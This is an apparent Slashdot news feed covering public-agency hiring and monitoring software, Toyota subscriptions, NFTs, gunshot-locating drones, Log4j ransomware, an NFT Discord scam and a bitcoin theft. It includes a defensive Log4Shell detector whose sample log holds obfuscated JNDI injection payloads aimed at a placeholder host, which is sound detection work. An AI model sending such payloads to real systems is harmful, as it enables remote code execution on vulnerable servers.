Public Agencies Are Buying Up AI-Driven Hiring Tools and ‘Bossware’

Through public records requests, The Markup found more than 20 public agencies using the sometimes-controversial software. From the report: In 2020, the FDA’s Center for Drug Evaluation and Research (CDER) faced a daunting task: It needed to fill more than 900 job vacancies — and fast. The center, which does things like inspect pharmaceutical manufacturing facilities, was in the process of modernizing the FDA’s New Drugs Regulatory Program just as the pandemic started. It faced “a surge in work,” along with new constraints that have affected everyone during the pandemic, including travel limitations and lockdowns. So they decided to turn to an artificial intelligence tool to speed up the hiring, according to records obtained by The Markup. The center, along with the Office of Management and the Division of Management Services, the background section of a statement of work said, were developing a “recruitment plan to leverage artificial intelligence (AI) to assist in the time to hire process.”

The agency ultimately chose to use HireVue, an online platform that allows employers to review asynchronously recorded video interviews and have recruits play video games as part of their application process. Over the years the platform has also offered a variety of AI features to automatically score candidates. HireVue, controversially, used to offer facial analysis to predict whether an applicant would be a good fit for an open job. In recent years, research has shown that facial recognition software is racially biased. In 2019, the company’s continued use of the technique led one member of its scientific advisory board to resign. It has since stopped using facial recognition. The Markup used GovSpend, a database of procurement records for U.S. agencies at the state, local, and federal levels, to identify agencies that use HireVue. We also searched for agencies using Teramind and ActivTrak, two other controversial products: software that allows employers to remotely monitor their workers’ browsing activities through screenshots and logs. The Markup contacted and filed public records requests with those 24 agencies to understand how they were using the software. Eleven public agencies, including the FDA, replied to The Markup with documents or confirmations that they had bought HireVue at some point since 2017. Of the six public agencies that replied to The Markup’s questions confirming that they actually used the software, all but one — Lake Travis Independent School District in Texas — confirmed they did not make use of the AI scoring features of the software. Documents and responses from 13 agencies confirmed that they purchased Teramind or ActivTrak at some point during the same time frame.

Read more of this story at Slashdot.

Toyota ‘Reviewing’ Key Fob Remote Start Subscription Plan After Massive Blowback

An anonymous reader shares a report: Earlier this month, we broke a story about Toyota locking its key fob remote start function behind a monthly subscription. If owners of certain models aren’t actively enrolled in a larger Toyota connected services plan, the proximity remote start function on the fob — that is, when you press the lock button three times to start the car while outside of it — will not work even though it sends the signal directly to the car. Obviously, this sent people into a frenzy whether they own a Toyota or not, because it was seen as a dark harbinger of the perils of fully-connected cars. Automakers now have the ability to nickel and dime people to death by charging ongoing subscription fees for functions that used to be a one-and-done purchase, and it looked like Toyota was hopping on the bandwagon.

At the time, Toyota declined to give us a detailed answer on why it chose to take a feature that doesn’t need an internet connection to function and moved it behind a paywall. Today, we’ve got answers. Toyota now claims it never intended to market the key fob remote start as a real feature, and it also says the subscription requirement was an inadvertent result of a relatively small technical decision related to the way its new vehicles are architected. Finally, Toyota has heard the outrage over the last week — a spokesperson told us the company was caught off guard by the blowback — and its executive team is currently examining whether it’s possible to reverse course and drop the subscription requirement for key fob remote start.

Read more of this story at Slashdot.

Virtual Guns in Videogames Could Soon Be Worth Real Money

Game makers are increasingly selling virtual weapons and gear as NFTs, extending the trendy digital deeds’ reach but rankling some players. From a report: More videogame makers are selling virtual guns, helmets and other gear in the form of NFTs, a move that is increasingly pushing the trendy digital deeds into the average household. Players have been paying for virtual goods in games like “Grand Theft Auto Online” and “World of Warcraft” for years, but turning those items into nonfungible tokens would let gamers trade and resell them, making them into potentially valuable assets. The change also could mean that players who buy an NFT in one game could use it later in other games, on social media and in other corners of the internet — an important step in developing an economy for the so-called metaverse. “FarmVille” maker Zynga and “Assassin’s Creed” creator Ubisoft Entertainment are among the first big, publicly traded gaming companies to say they are experimenting with the strategy. Electronic Arts, Playtika and others are also looking into NFTs’ potential use for engaging players.

“We’re doing this because this may be part of the future of gaming,” said Matt Wolf, Zynga’s new vice president of blockchain gaming. “This is all about community building.” Nonfungible tokens are essentially digital deeds that verify the authenticity of the items they represent as unique. They are the latest internet-based collecting craze, and so far they have come in forms ranging from digital artwork and trading cards to virtual real estate and sneakers, as well as concert tickets and even sports highlights. The tokens are stored on a blockchain, a digital ledger that shows when they were purchased and for how much, and ensures NFTs can’t be duplicated or changed. Amid all that activity, NFTs’ advent in videogames holds particular significance because gamers spend so much time in virtual worlds. That makes them potential early adopters in the metaverse — a virtual realm where proponents say people will work, play and shop and where technology experts say the ability to buy and sell NFTs will be key.

Read more of this story at Slashdot.

New Policing System Will Send Drones To the Source of Gunshots

A new policing system is being developed that will send autonomous drones equipped with shot-locating technology to the source of gunshots. “By analyzing the live video from its onboard camera, police officers can then gain a better sense of the situation they’re heading into,” reports New Atlas. From the report: Already in use in over 120 cities in the US, South Africa and the Caribbean, the American ShotSpotter system utilizes a network of microphones within a neighborhood to detect “loud, impulsive sounds.” Whenever such a sound is detected, its geographical originating point can be triangulated by analyzing the millisecond differences in the times at which it was picked up by the different microphones — the closer a mic was to the gun, the earlier it will have detected the sound of that gun firing. That said, a combination of AI software and human staff (at a control center) is used to determine if the sound is indeed gunfire.

In the existing version of the system, police are quickly dispatched to the location. If they’re using ground transportation, however, it may take a while for them to get there. And even if the police department has a helicopter, performing pre-flight checks, etc will still take some time — assuming the aircraft isn’t already in the air on patrol, that is. With these potential limitations in mind, Israeli drone manufacturer Airobotics has teamed up with ShotSpotter to add autonomous drones to the mix. In the new version of the setup, police will still be dispatched, but so will the closest system-specific drone. That aircraft will be in the air within seconds, immediately flying to the source of the gunshots. By analyzing the live video from its onboard camera, police officers can then gain a better sense of the situation they’re heading into.
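The report above describes the locating step only in one sentence: the origin is found from millisecond differences in arrival time across several microphones (strictly, that is multilateration from time differences of arrival, not triangulation). The following is an added example, not ShotSpotter's or Airobotics' code, showing the technique end to end: constructed sensor positions and arrival times for a 600 m block, a coarse grid search over the sensor footprint, and a Gauss-Newton refinement of the two unknown coordinates. The speed of sound, the sensor layout and the four-microphone minimum are assumptions of the example; a real deployment has to model weather and the classification of "loud, impulsive sounds" as gunfire or not, which the report says is done separately by software and human reviewers.

```python
import math

SPEED_OF_SOUND = 343.0  # m/s in air at about 20 C; assumed constant here, a real deployment corrects for weather


def _dist(a, b):
    return math.hypot(a[0] - b[0], a[1] - b[1])


def simulate_arrivals(source, mics, fired_at=0.0):
    """Constructed sensor data: the absolute time each microphone hears a shot at `source`.
    Closer microphones get earlier timestamps, which is the whole signal the locator uses."""
    return [fired_at + _dist(source, m) / SPEED_OF_SOUND for m in mics]


def _range_residuals(point, mics, tdoas):
    """Range-difference error in metres per non-reference mic: (d_i - d_0) - c * (t_i - t_0)."""
    d0 = _dist(point, mics[0])
    return [(_dist(point, m) - d0) - SPEED_OF_SOUND * dt for m, dt in zip(mics[1:], tdoas)]


def locate(mics, times, grid_step=20.0, iters=30):
    """Estimate the (x, y) origin of an impulsive sound from per-microphone arrival times.
    The firing time is unknown, so only differences (TDOAs) relative to mic 0 are used."""
    if len(mics) != len(times) or len(mics) < 4:
        raise ValueError("need matching lists and at least 4 microphones for an unambiguous 2-D fix")
    tdoas = [t - times[0] for t in times[1:]]

    # Stage 1: coarse grid search across the sensor bounding box. Hyperbolic TDOA
    # cost surfaces can have spurious local minima, so do not start Gauss-Newton blind.
    xs, ys = [m[0] for m in mics], [m[1] for m in mics]
    best, best_cost = (xs[0], ys[0]), float("inf")
    x = min(xs)
    while x <= max(xs):
        y = min(ys)
        while y <= max(ys):
            cost = sum(r * r for r in _range_residuals((x, y), mics, tdoas))
            if cost < best_cost:
                best, best_cost = (x, y), cost
            y += grid_step
        x += grid_step

    # Stage 2: Gauss-Newton refinement of the two unknowns starting from the best grid cell.
    px, py = best
    for _ in range(iters):
        d0 = _dist((px, py), mics[0])
        dists = [_dist((px, py), m) for m in mics[1:]]
        if d0 == 0.0 or 0.0 in dists:
            break  # sitting exactly on a sensor: gradient undefined, keep the grid answer
        r = _range_residuals((px, py), mics, tdoas)
        jac = [((px - m[0]) / di - (px - mics[0][0]) / d0,
                (py - m[1]) / di - (py - mics[0][1]) / d0) for m, di in zip(mics[1:], dists)]
        # Normal equations (J^T J) delta = -J^T r for a 2x2 system, solved in closed form.
        a = sum(jx * jx for jx, _ in jac)
        b = sum(jx * jy for jx, jy in jac)
        c = sum(jy * jy for _, jy in jac)
        g0 = sum(jx * ri for (jx, _), ri in zip(jac, r))
        g1 = sum(jy * ri for (_, jy), ri in zip(jac, r))
        det = a * c - b * b
        if abs(det) < 1e-12:
            break
        dx = (-c * g0 + b * g1) / det
        dy = (b * g0 - a * g1) / det
        px, py = px + dx, py + dy
        if math.hypot(dx, dy) < 1e-4:
            break
    return px, py


if __name__ == "__main__":
    # Constructed layout: four sensors on the corners of a 600 m block, shot fired at (210, 350).
    mics = [(0.0, 0.0), (600.0, 0.0), (0.0, 600.0), (600.0, 600.0)]
    times = simulate_arrivals((210.0, 350.0), mics, fired_at=12.5)
    print("arrival times (s):", [round(t, 4) for t in times])
    print("estimated origin (m):", locate(mics, times))
```

Three microphones give three range differences but only two independent hyperbolae, which can intersect twice; the fourth sensor is what makes the fix unambiguous, and in practice more sensors are wanted because timestamp jitter of a single millisecond already moves a hyperbola by about a third of a metre.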

Read more of this story at Slashdot.

Second Ransomware Family Exploiting Log4j Spotted In US, Europe

Researchers say a second family of ransomware has been growing in usage for attack attempts that exploit the critical vulnerability in Apache Log4j, including in the U.S. and Europe. VentureBeat reports: A number of researchers, including at cybersecurity giant Sophos, have now said they’ve observed the attempted deployment of a ransomware family known as TellYouThePass. Researchers have described TellYouThePass as an older and largely inactive ransomware family — which has been revived following the discovery of the vulnerability in the widely used Log4j logging software. TellYouThePass is the second family of ransomware that’s been observed to exploit the vulnerability in Log4j, known as Log4Shell, joining the Khonsari ransomware, according to researchers.

While previous reports indicated that TellYouThePass was mainly being directed against targets in China, researchers at Sophos told VentureBeat that they’ve observed the attempted delivery of TellYouThePass ransomware both inside and outside of China — including in the U.S. and Europe. “Systems in China were targeted, as well as some hosted in Amazon and Google cloud services in the U.S. and at several sites in Europe,” said Sean Gallagher, a senior threat researcher at Sophos Labs, in an email to VentureBeat on Tuesday. Sophos detected attempts to deliver TellYouThePass payloads by utilizing the Log4j vulnerability on December 17 and December 18, Gallagher said. TellYouThePass has versions that run on either Linux or Windows, “and has a history of exploiting high-profile vulnerabilities like EternalBlue,” said Andrew Brandt, a threat researcher at Sophos, in an email. The Linux version is capable of stealing Secure Socket Shell (SSH) keys and can perform lateral movement, Brandt said. Sophos initially disclosed its detection of TellYouThePass ransomware in a December 20 blog post.

The first report of TellYouThePass ransomware exploiting the Log4j vulnerability appears to have come from the head of Chinese cybersecurity group KnownSec 404 Team on December 12. The attempted deployment of TellYouThePass in conjunction with Log4Shell was subsequently confirmed by additional researchers, according to researcher community Curated Intelligence. In a blog post Tuesday, Curated Intelligence said its members can now confirm that TellYouThePass has been seen exploiting the vulnerability “in the wild to target both Windows and Linux systems.” TellYouThePass had most recently been observed in July 2020, Curated Intelligence said. It joins Khonsari, a new family of ransomware identified in connection with exploits of the Log4j vulnerability.
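The story names Log4Shell but never describes what an exploitation attempt looks like on the wire, which is the first thing a defender triaging web logs from this period wants. The following is an added example, not code from Sophos, VentureBeat or Curated Intelligence: it scans constructed access-log lines for the well-known Log4Shell trigger, a `${jndi:...}` lookup string reaching the logger (CVE-2021-44228, not cited on the page), after first folding the common obfuscations that nest `${lower:..}`, `${upper:..}` and default-value lookups such as `${::-j}` to hide the literal `jndi` from naive string matching. The sample log, the IP addresses (203.0.113.0/24 is a documentation range) and the set of obfuscations handled are assumptions of the example.

```python
import re

# Only innermost lookups match ([^${}] forbids nesting), so repeated passes resolve inside-out.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")  # ${env:NOPE:-j} and ${::-j} both yield "j"
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(text, max_passes=20):
    """Undo the lookup-nesting tricks used to hide the `${jndi:` trigger from naive string matches."""
    for _ in range(max_passes):
        folded = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), text)
        folded = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), folded)
        if folded == text:
            return text
        text = folded
    return text  # pass budget exhausted: deeply nested input, treat whatever is left as-is


def is_log4shell_attempt(line):
    """True when the line, after de-obfuscation, carries a JNDI lookup that a vulnerable Log4j would resolve."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (index, normalized line) for every line carrying a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_log4shell_attempt(line)]


# Constructed sample access log, not from any real incident. Lines 1-3 carry the trigger in
# the User-Agent field, the usual injection point; lines 0 and 4 are benign, line 4 on purpose
# containing a lookup that is not JNDI.
SAMPLE_LOG = [
    '203.0.113.9 - - [17/Dec/2021:03:14:07 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [17/Dec/2021:03:14:08 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '203.0.113.9 - - [17/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/b}"',
    '203.0.113.9 - - [17/Dec/2021:03:14:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/c}"',
    '203.0.113.9 - - [17/Dec/2021:03:14:11 +0000] "GET /status HTTP/1.1" 200 64 "-" "health-check/1.0 ${env:HOSTNAME}"',
]

if __name__ == "__main__":
    for idx, folded in scan(SAMPLE_LOG):
        print(f"line {idx}: {folded}")
```

A hit only shows that someone tried; whether the lookup was resolved depends on the Log4j version behind the logger, and the host-side follow-up is to check for outbound LDAP or RMI connections to the address in the lookup. Any `${` sequence arriving in a client-controlled header is worth an alert on its own during an active campaign, since attackers vary the nesting faster than a fixed regex set can follow; the durable fix is upgrading Log4j rather than tuning this filter.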

Read more of this story at Slashdot.

Twitch Co-Founder Gets Discord Hacked, $150,000 Stolen From Users In NFT Scam

Luke Plunkett writes via Kotaku: Justin Kan, a co-founder of Twitch and the dude Justin.TV was named for, last week decided to launch a site called Fractal. It was to be a ‘marketplace’ where in-game items could be bought and sold as NFTs. Later, in Fractal’s Discord server, a link appeared advertising a drop of 3,333 NFTs. You may have guessed what happened next. As Twitch reporter Zach Bussey has detailed, the message, which appeared legit since it was coming from inside the house, had actually been posted by someone gaining access to Fractal’s Discord bot, pointing towards ‘Fractai’, not Fractal. The scammers managed to “sell” 3,294 NFTs before the plug was pulled. There were of course no actual NFTs being sold at all, just money being straight up stolen — over $150,000 — though you’d be forgiven for wondering what the difference is.

In response, the Fractal team issued a statement acknowledging the breach, along with a promise they are “going to make this right.” […] Fractal say they are “planning to fully compensate these 373 victims,” before adding the extraordinary warning, “We must use our best judgement as there’s no ‘undo button’ in crypto,” making the entire post read like a textbook example of showcasing why this is such a shitty space. Meanwhile, Kan issued a short video statement of his own, alongside warnings that this Discord scam had been perpetrated on other NFT communities as well.

Read more of this story at Slashdot.

US Returns $154 Million In Bitcoins Stolen By Sony Employee

The United States has taken legal action to seize and return over $154 million purportedly stolen from Sony Life Insurance Company Ltd, a SONY subsidiary, by an employee in a textbook business email compromise (BEC) attack. BleepingComputer reports: “According to the government’s complaint, Rei Ishii, an employee of Sony Life Insurance Company Ltd. (“Sony Life”) in Tokyo, allegedly diverted the $154 million when the company attempted to transfer funds between its financial accounts,” the Justice Dept said today. “Ishii allegedly did this by falsifying transaction instructions, which caused the funds to be transferred to an account that Ishii controlled at a bank in La Jolla, California.”

According to court documents, Ishii switched the transfer address for a Sony Life transaction to use a Silvergate Bank account under his control. Ishii later converted the stolen funds into more than 3879 bitcoins via a Coinbase account set up to automatically transfer all added funds to an offline cryptocurrency cold wallet […]. After converting the money to cryptocurrency, Ishii also tried persuading his supervisor and several Sony Life executives not to help investigators by emailing them a ransom note typed in English and Japanese. “If you accept the settlement, we will return the funds back. If you are going to file criminal charges, it will be impossible to recover the funds,” the note read. “We might go down behind all of this, but one thing is for sure, you are going to be right there next to us. We strongly recommend to stop communicate (sic) with any third parties including law enforcement.”

However, on December 1, following an investigation in collaboration with Japanese law enforcement authorities, the FBI seized the 3879.16242937 BTC in Ishii’s wallet after obtaining the private key, which made it possible to transfer all the bitcoins to the FBI’s bitcoin wallet. […] Tokyo’s Metropolitan Police Department arrested the 32-year-old Ishii the same day and criminally charged him on suspicion of obtaining $154 million following fraudulent money transfers from mid-May.

Read more of this story at Slashdot.